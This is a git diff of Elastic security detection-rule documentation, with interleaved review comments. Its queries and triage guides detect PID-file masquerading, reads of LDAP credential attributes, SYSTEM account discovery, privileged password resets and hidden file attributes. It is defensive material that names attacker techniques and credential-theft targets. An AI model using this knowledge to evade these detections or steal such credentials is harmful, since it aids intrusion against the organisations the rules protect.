docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-parent-process.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-writing-data-to-an-external-device.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-service-host-child-process-childless-service.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-user-privilege-enumeration-via-id.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-virtual-machine-fingerprinting.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-wmic.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-web-shell-detection-script-process-child-of-common-web-processes.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-defender-disabled-via-registry-modification.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-firewall-disabled-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-script-executing-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-script-interpreter-executing-process-via-wmi.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-wmi-incoming-lateral-movement.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rules-8-10-5-appendix.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rules-8-10-5-summary.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/archive-file-with-unusual-extension.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/delayed-execution-via-ping.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/executable-file-with-unusual-extension.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/execution-from-a-removable-media-with-network-connection.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/execution-via-microsoft-dotnet-clickonce-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/execution-via-ms-visualstudio-pre-post-build-events.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/image-loaded-with-invalid-signature.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc create mode 100644 
docs/detections/prebuilt-rules/rule-details/memory-dump-file-with-unusual-extension.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/netcat-listener-established-via-rlwrap.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-memory-dump-file-creation.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-region.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-dga-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-file-transfer-via-certreq.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-linux-hack-tool-launched.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-network-scan-executed-from-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-python-cap-setuid.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-process-injection-from-malicious-document.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-remote-file-execution-via-msiexec.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-ssh-it-ssh-worm-downloaded.asciidoc create mode 100644 
docs/detections/prebuilt-rules/rule-details/potential-upgrade-of-non-interactive-shell.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/remote-xsl-script-execution-via-com.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/setcap-setuid-setgid-capability-set.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/spike-in-bytes-sent-to-an-external-device.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-execution-via-msiexec.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-troubleshooting-pack-cabinet-execution.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/tainted-kernel-module-load.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/unix-socket-connection.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/unsigned-bits-service-client-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-parent-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/unusual-process-writing-data-to-an-external-device.asciidoc create mode 100644 
docs/detections/prebuilt-rules/rule-details/windows-installer-with-suspicious-properties.asciidoc diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-abnormal-process-id-or-lock-file-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-abnormal-process-id-or-lock-file-created.asciidoc new file mode 100644 index 0000000000..1fbd707ca3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-abnormal-process-id-or-lock-file-created.asciidoc 
@@ -0,0 +1,122 @@ +[[prebuilt-rule-8-10-5-abnormal-process-id-or-lock-file-created]] +=== Abnormal Process ID or Lock File Created + +Identifies the creation of a Process ID (PID), lock or reboot file created in temporary file storage paradigm (tmpfs) directory /var/run. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.sandflysecurity.com/blog/linux-file-masquerading-and-malicious-pids-sandfly-1-2-6-update/ +* https://twitter.com/GossiTheDog/status/1522964028284411907 +* https://exatrack.com/public/Tricephalic_Hellkeeper.pdf +* https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Threat: BPFDoor +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Abnormal Process ID or Lock File Created + +Linux applications may need to save their process identification number (PID) for various purposes: from signaling that a program is running to serving as a signal that a previous instance of an application didn't exit successfully. PID files contain its creator process PID in an integer value. 
+ +Linux lock files are used to coordinate operations in files so that conflicts and race conditions are prevented. + +This rule identifies the creation of PID, lock, or reboot files in the /var/run/ directory. Attackers can masquerade malware, payloads, staged data for exfiltration, and more as legitimate PID files. + +#### Possible investigation steps + +- Retrieve the file and determine if it is malicious: + - Check the contents of the PID files. They should only contain integer strings. + - Check the file type of the lock and PID files to determine if they are executables. This is only observed in malicious files. + - Check the size of the subject file. Legitimate PID files should be under 10 bytes. + - Check if the lock or PID file has high entropy. This typically indicates an encrypted payload. + - Analysts can use tools like `ent` to measure entropy. + - Examine the reputation of the SHA-256 hash in the PID file. Use a database like VirusTotal to identify additional pivots and artifacts for investigation. +- Trace the file's creation to ensure it came from a legitimate or authorized process. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections. +- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes. + +### False positive analysis + +- False positives can appear if the PID file is legitimate and holding a process ID as intended. If the PID file is an executable or has a file size that's larger than 10 bytes, it should be ruled suspicious. +- If this activity is expected and noisy in your environment, consider adding exceptions — preferably with a combination of file name and process executable conditions. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. 
+- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Block the identified indicators of compromise (IoCs). +- Take actions to terminate processes and connections used by the attacker. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.category:file and event.action:creation and +user.id:0 and file.extension:(pid or lock or reboot) and file.path:(/var/run/* or /run/*) and ( + (process.name : ( + bash or dash or sh or tcsh or csh or zsh or ksh or fish or ash or touch or nano or vim or vi or editor or mv or cp) + ) or ( + process.executable : ( + ./* or /tmp/* or /var/tmp/* or /dev/shm/* or /var/run/* or /boot/* or /srv/* or /run/* + )) +) and not process.name : (go or git or containerd* or snap-confine) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ 
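Review bot: the ATT&CK mapping at the end of this hunk (`** Name: Native API`, `** ID: T1106`, under Tactic: Execution) does not describe what the query detects, which is a root-owned `.pid`/`.lock`/`.reboot` file created under `/var/run` or `/run` by a shell, editor or coreutils process, or by an executable running from a writable or unusual location; the description and the guide's own wording ("Attackers can masquerade malware, payloads, staged data for exfiltration, and more as legitimate PID files") describe masquerading, so consider re-tagging to T1036 (Defense Evasion) and changing the `Tactic:` tag to match. Two smaller points in the same hunk: the `process.executable : (./* ...)` clause is unlikely ever to match, because ECS records `process.executable` as an absolute path, so either drop it or document why it is there; and in the investigation guide "This is only observed in malicious files" is stronger than a medium-severity rule should assert, and "PID files contain its creator process PID" should read "PID files contain their creator process's PID".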
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-access-to-a-sensitive-ldap-attribute.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-access-to-a-sensitive-ldap-attribute.asciidoc new file mode 100644 index 0000000000..e6708794ea --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-access-to-a-sensitive-ldap-attribute.asciidoc 
@@ -0,0 +1,130 @@ +[[prebuilt-rule-8-10-5-access-to-a-sensitive-ldap-attribute]] +=== Access to a Sensitive LDAP Attribute + +Identify access to sensitive Active Directory object attributes that contains credentials and decryption keys such as unixUserPassword, ms-PKI-AccountCredentials and msPKI-CredentialRoamingTokens. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming +* https://social.technet.microsoft.com/wiki/contents/articles/11483.windows-credential-roaming.aspx +* https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5136 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Privilege Escalation +* Use Case: Active Directory Monitoring +* Data Source: Active Directory + +*Version*: 8 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure). 
+Steps to implement the logging policy with Advanced Audit Configuration: + +``` +Computer Configuration > +Policies > +Windows Settings > +Security Settings > +Advanced Audit Policies Configuration > +Audit Policies > +DS Access > +Audit Directory Service Access (Success,Failure) +``` +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +any where event.action == "Directory Service Access" and event.code == "4662" and + + not winlog.event_data.SubjectUserSid : "S-1-5-18" and + + winlog.event_data.Properties : ( + /* unixUserPassword */ + "*612cb747-c0e8-4f92-9221-fdd5f15b550d*", + + /* ms-PKI-AccountCredentials */ + "*b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7*", + + /* ms-PKI-DPAPIMasterKeys */ + "*b3f93023-9239-4f7c-b99c-6745d87adbc2*", + + /* msPKI-CredentialRoamingTokens */ + "*b7ff5a38-0818-42b0-8110-d3d154c97f24*" + ) and + + /* + Excluding noisy AccessMasks + 0x0 undefined and 0x100 Control Access + https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662 + */ + not winlog.event_data.AccessMask in ("0x0", "0x100") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Private Keys +** ID: T1552.004 +** Reference URL: https://attack.mitre.org/techniques/T1552/004/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: 
https://attack.mitre.org/techniques/T1078/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-account-discovery-command-via-system-account.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-account-discovery-command-via-system-account.asciidoc new file mode 100644 index 0000000000..703bc2095e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-account-discovery-command-via-system-account.asciidoc 
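Review bot: The description of the Access to a Sensitive LDAP Attribute rule lists three attributes (unixUserPassword, ms-PKI-AccountCredentials and msPKI-CredentialRoamingTokens), but the query also matches a fourth GUID (`/* ms-PKI-DPAPIMasterKeys */ "*b3f93023-9239-4f7c-b99c-6745d87adbc2*"`); please list all four so readers of the description know that DPAPI master key access also triggers the rule. The Investigation guide in this file contains only the audit-policy prerequisite and none of the triage, false positive or response sections the neighbouring rules carry; since the query already drops AccessMask `0x0` and `0x100` and exempts `S-1-5-18`, a short note on how to treat remaining noise from legitimate service accounts that read these attributes would be useful. Minor: "attributes that contains credentials" should read "attributes that contain credentials".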
@@ -0,0 +1,114 @@ +[[prebuilt-rule-8-10-5-account-discovery-command-via-system-account]] +=== Account Discovery Command via SYSTEM Account + +Identifies when the SYSTEM account uses an account discovery utility. This could be a sign of discovery activity after an adversary has achieved privilege escalation. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Discovery +* Tactic: Privilege Escalation +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Account Discovery Command via SYSTEM Account + +After successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software. + +This rule looks for the execution of account discovery utilities using the SYSTEM account, which is commonly observed after attackers successfully perform privilege escalation or exploit web applications. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. 
+ - If the process tree includes a web-application server process such as w3wp, httpd.exe, nginx.exe and alike, investigate any suspicious file creation or modification in the last 48 hours to assess the presence of any potential webshell backdoor. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Determine how the SYSTEM account is being used. For example, users with administrator privileges can spawn a system shell using Windows services, scheduled tasks or other third party utilities. + +### False positive analysis + +- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +- Use the data collected through the analysis to investigate other machines affected in the environment. 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (?process.Ext.token.integrity_level_name : "System" or + ?winlog.event_data.IntegrityLevel : "System") and + (process.name : "whoami.exe" or + (process.name : "net1.exe" and not process.parent.name : "net.exe")) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: System Owner/User Discovery +** ID: T1033 +** Reference URL: https://attack.mitre.org/techniques/T1033/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Local Accounts +** ID: T1078.003 +** Reference URL: https://attack.mitre.org/techniques/T1078/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-account-password-reset-remotely.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-account-password-reset-remotely.asciidoc new file mode 100644 index 0000000000..6da941547f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-account-password-reset-remotely.asciidoc 
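Review bot: The query for Account Discovery Command via SYSTEM Account excludes `net1.exe` when its parent is `net.exe` (`(process.name : "net1.exe" and not process.parent.name : "net.exe")`) and does not match `net.exe` itself, so invocations that go through `net.exe` (the very case the parent-name exclusion targets) will not fire this rule when run as SYSTEM; if that is intentional because another rule covers it, please say so in the description or add a Related rules section as the AdFind rule has, otherwise the exclusion reads as a gap. The description also speaks generally of "an account discovery utility" while the query only covers `whoami.exe` and the direct `net1.exe` case; listing the covered binaries would set expectations correctly.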
@@ -0,0 +1,89 @@ +[[prebuilt-rule-8-10-5-account-password-reset-remotely]] +=== Account Password Reset Remotely + +Identifies an attempt to reset a potentially privileged account password remotely. Adversaries may manipulate account passwords to maintain access or evade password duration policies and preserve compromised credentials. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4724 +* https://stealthbits.com/blog/manipulating-user-passwords-with-mimikatz/ +* https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Credential%20Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +* https://www.elastic.co/security-labs/detect-credential-access + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Impact + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by winlog.computer_name with maxspan=5m + [authentication where event.action == "logged-in" and + /* event 4624 need to be logged */ + winlog.logon.type : "Network" and event.outcome == "success" and source.ip != null and + source.ip != "127.0.0.1" and source.ip != "::1"] by winlog.event_data.TargetLogonId + /* event 4724 need to be logged */ + [iam where event.action == "reset-password" and + ( + /* + This rule is very noisy if not scoped to privileged accounts, duplicate the + rule and add your own naming convention and accounts of interest here. 
+ */ + winlog.event_data.TargetUserName: ("*Admin*", "*super*", "*SVC*", "*DC0*", "*service*", "*DMZ*", "*ADM*") or + winlog.event_data.TargetSid : ("S-1-5-21-*-500", "S-1-12-1-*-500") + ) + ] by winlog.event_data.SubjectLogonId + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Account Access Removal +** ID: T1531 +** Reference URL: https://attack.mitre.org/techniques/T1531/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adding-hidden-file-attribute-via-attrib.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adding-hidden-file-attribute-via-attrib.asciidoc new file mode 100644 index 0000000000..ae3d27d993 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adding-hidden-file-attribute-via-attrib.asciidoc 
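Review bot: The only operational guidance for the Account Password Reset Remotely rule lives inside query comments (`/* event 4624 need to be logged */`, `/* event 4724 need to be logged */`, and the note that the rule "is very noisy if not scoped to privileged accounts, duplicate the rule and add your own naming convention"), and this file has no Investigation guide section at all, unlike the neighbouring rules; please move the audit prerequisites and the tuning advice into a guide or setup section where users of the rendered docs will see them, and state there that the `TargetUserName` wildcard list (`*Admin*`, `*super*`, `*SVC*`, `*DC0*`, `*service*`, `*DMZ*`, `*ADM*`) is a naming-convention placeholder meant to be replaced. Also, "event 4624 need to be logged" should read "event 4624 needs to be logged" in both comments.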
@@ -0,0 +1,146 @@ +[[prebuilt-rule-8-10-5-adding-hidden-file-attribute-via-attrib]] +=== Adding Hidden File Attribute via Attrib + +Adversaries can add the 'hidden' attribute to files to hide them from the user in an attempt to evade detection. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Persistence +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 109 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Adding Hidden File Attribute via Attrib + +The `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. + +Attackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it. + +This rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. 
+- Contact the account owner and confirm whether they are aware of this activity. +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine the command line to identify the target file or folder. + - Examine the file, which process created it, header, etc. + - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Examine the host for derived artifacts that indicate suspicious activities: + - Observe and collect information about the following activities in the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. 
